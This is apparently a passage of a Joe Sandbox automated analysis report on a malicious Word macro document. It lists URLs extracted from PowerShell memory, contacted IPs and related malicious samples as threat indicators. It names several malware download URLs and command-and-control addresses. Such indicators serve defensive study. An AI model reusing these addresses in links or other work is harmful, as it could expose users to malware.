                https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/offene-stellen/0%Avira URL Cloudsafe
                https://physio-svdh.ch/angebot/training-fuer-senioren/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp0%Avira URL Cloudsafe
                https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
                https://cairocad.com/cgi-bin/1PBB/100%Avira URL Cloudmalware
                https://www.isatechnology.comArAC0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi0%Avira URL Cloudsafe
                https://physio-svdh.ch/xmlrpc.php0%Avira URL Cloudsafe
                http://ownitconsignment.com/files/b/100%Avira URL Cloudmalware
                https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/comments/feed/0%Avira URL Cloudsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?v0%Avira URL Cloudsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.00%Avira URL Cloudsafe
                https://staging.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                isatechnology.com
                		35.208.182.43
                		truetrueunknown
                physio-svdh.ch
                		194.209.195.106
                		truefalse
                  		unknown
                  www.isatechnology.com
                  		unknown
                  		unknowntrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://shell.suite.office.com:1443DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                      		high
                      https://autodiscover-s.outlook.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                        		high
                        http://isatechnology.compowershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://corp.roblox.com/contact/svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpfalse
                          		high
                          https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                            		high
                            https://physio-svdh.ch/angebot/physiotherapie/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.isatechnology.com/training/b/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://cdn.entity.DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                              		high
                              https://rpsticket.partnerservices.getmicrosoftkey.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v1DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                		high
                                http://transfersuvan.com/wp-admin/OVl/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://physio-svdh.ch/wp-content/themes/econature/js/jquer0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                    		high
                                    https://api.aadrm.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://physio-svdh.ch/angebot/hausbesuche/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://cps.root-x1.letsencrypt.powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://use.fontawesome.com/releases/v5.8.2/css/all.css?ver=5.5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                      		high
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                        		high
                                        https://api.microsoftstream.com/api/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                          		high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                            		high
                                            https://cr.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpfalse
                                                		high
                                                https://physio-svdh.ch/kontakt/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.689707383.00000271135D1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.hulu.com/do-not-sell-my-infosvchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://store.office.cn/addinstemplateDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://cps.letsencrypt.org0powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://wus2-000.pagecontentsync.DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7cpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.roblox.com/developsvchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                            		high
                                                            https://physio-svdh.ch/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.odwebp.svc.msDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                		high
                                                                https://corp.roblox.com/parents/svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://graph.windows.netDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                    		high
                                                                    https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://gmpg.org/xfn/11powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                          		high
                                                                          https://physio-svdh.chpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                            		high
                                                                            http://weather.service.msn.com/data.aspxDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                              		high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                		high
                                                                                https://physio-svdh.ch/ueber-uns/about-us/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                  		high
                                                                                  https://clients.config.office.net/user/v1.0/iosDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                    		high
                                                                                    http://arquivopop.com.br/index_htm_files/Kxh/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://o365auditrealtimeingestion.manage.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                      		high
                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                        		high
                                                                                        https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://clients.config.office.net/user/v1.0/android/policiesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                          		high
                                                                                          https://physio-svdh.ch/offene-stellen/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://physio-svdh.ch/angebot/training-fuer-senioren/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://entitlement.diagnostics.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                            		high
                                                                                            https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wppowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                              		high
                                                                                              https://outlook.office.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                		high
                                                                                                https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://physio-svdh.ch/wp-includes/wlwmanifest.xmlpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://cairocad.com/cgi-bin/1PBB/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://storage.live.com/clientlogs/uploadlocationDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                  		high
                                                                                                  https://www.hulu.com/ca-privacy-rightssvchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.isatechnology.comArACpowershell.exe, 00000004.00000002.697183346.0000027114743000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedipowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://physio-svdh.ch/xmlrpc.phppowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://graph.windows.net/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                        		high
                                                                                                        https://devnull.onenote.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                          		high
                                                                                                          http://ownitconsignment.com/files/b/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://messaging.office.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                            		high
                                                                                                            https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://physio-svdh.ch/comments/feed/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              		high
                                                                                                              https://skyapi.live.net/Activity/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?vpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://api.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                		high
                                                                                                                https://staging.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://onedrive.live.com/embed?DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                  		high
                                                                                                                  https://augloop.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                    		high

                                                                                                                    Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    194.209.195.106
                                                                                                                    		unknownSwitzerland
                                                                                                                    		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
                                                                                                                    97.120.3.198
                                                                                                                    		unknownUnited States
                                                                                                                    		209CENTURYLINK-US-LEGACY-QWESTUStrue
                                                                                                                    35.208.182.43
                                                                                                                    		unknownUnited States
                                                                                                                    		19527GOOGLE-2UStrue
                                                                                                                    70.180.33.202
                                                                                                                    		unknownUnited States
                                                                                                                    		22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                    50.116.111.59
                                                                                                                    		unknownUnited States
                                                                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                    173.249.20.233
                                                                                                                    		unknownGermany
                                                                                                                    		51167CONTABODEtrue

                                                                                                                    Private

                                                                                                                    IP
                                                                                                                    192.168.2.1

                                                                                                                    General Information

                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                    Analysis ID:347028
                                                                                                                    Start date:01.02.2021
                                                                                                                    Start time:23:24:14
                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                    Overall analysis duration:0h 7m 49s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:light
                                                                                                                    Sample file name:v22Pc0qA.doc.doc
                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • HDC enabled
                                                                                                                    • GSI enabled (VBA)
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.evad.winDOC@16/14@3/7
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                    HDC Information:
                                                                                                                    • Successful, ratio: 99.9% (good quality ratio 95%)
                                                                                                                    • Quality average: 79.8%
                                                                                                                    • Quality standard deviation: 27.5%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 77%
                                                                                                                    • Number of executed functions: 0
                                                                                                                    • Number of non-executed functions: 0
                                                                                                                    Cookbook Comments:
                                                                                                                    • Adjust boot time
                                                                                                                    • Enable AMSI
                                                                                                                    • Found application associated with file extension: .doc
                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                    • Found warning dialog
                                                                                                                    • Click Ok
                                                                                                                    • Attach to Office via COM
                                                                                                                    • Scroll down
                                                                                                                    • Close Viewer
                                                                                                                    Warnings:
                                                                                                                    Show All
                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.109.76.68, 52.109.12.24, 104.43.193.48, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 8.248.141.254, 8.253.204.249, 8.241.122.254, 8.241.121.254, 8.241.122.126
                                                                                                                    • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    23:25:14API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                    23:25:44API Interceptor10x Sleep call for process: svchost.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    194.209.195.106v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                      2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                        97.120.3.198EIS-120120 QZC-122220.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/0f5m62spd/kt0d01/
                                                                                                                        Copy invoice #422380.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/xzr508fg58hgt/p8q6sgg9gwgr8rs9/q9cynhg/8dxqwjpu230yl15/
                                                                                                                        9486874.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/91y1l3z4v/xizwgksqrllsyqu/eraoyl9t2wlrof/g8pufykrilt/6brn7fffklsas/q3gkoa/
                                                                                                                        Electronic form.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/w9v9j4zmq7bejeic2e/
                                                                                                                        TZ8322852306TL.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/do8iadgzwnq3qa9povw/6zdyqngmhmmc69wdpj/
                                                                                                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/uvn2j/un8q1/
                                                                                                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/pos89yydi24uxtcmlz6/f631/8x9c2bk8t4r/zorb8/ogci/cggy1evlrwxdj5h/
                                                                                                                        https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/19kj6/g5h9bzym006c7j/43ay3ofpznbzj38/1qfz5tqd3/r5exfcpnarwn4c/6ne8dy3r0jelw2qnbi/
                                                                                                                        http://gluonpharma.com/fonts/W/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/ug9rsi0iq7da8qet86h/jg29c6vldf/6fyvceyue/sfz5vfi4e22/
                                                                                                                        35.208.182.43v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                          2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                            GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                              70.180.33.2028wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 70.180.33.202/fln18ojo9upin4s/szxw2xk/75f0/0f66f0gsp71bm7w/
                                                                                                                              50.116.111.59Electronic form.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/p28e7od863phitwqz2s/7roopj5/r6b06xe3e8xmqs8g/9tmo0q2t/i21l8k4/mkj91zepqc0f7n/
                                                                                                                              8wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/805kib7/vp5sm5n4p5u7ghz3w9/6ugmso/0sjuxpasi/
                                                                                                                              http://perfumeriarecuerdame.cl/overillustration/lTqyZy8AT7ByAidoAEArFkYch5nVjGFftnZdnv8yqAaPMnENN7URxUqiCu/Get hashmaliciousBrowse
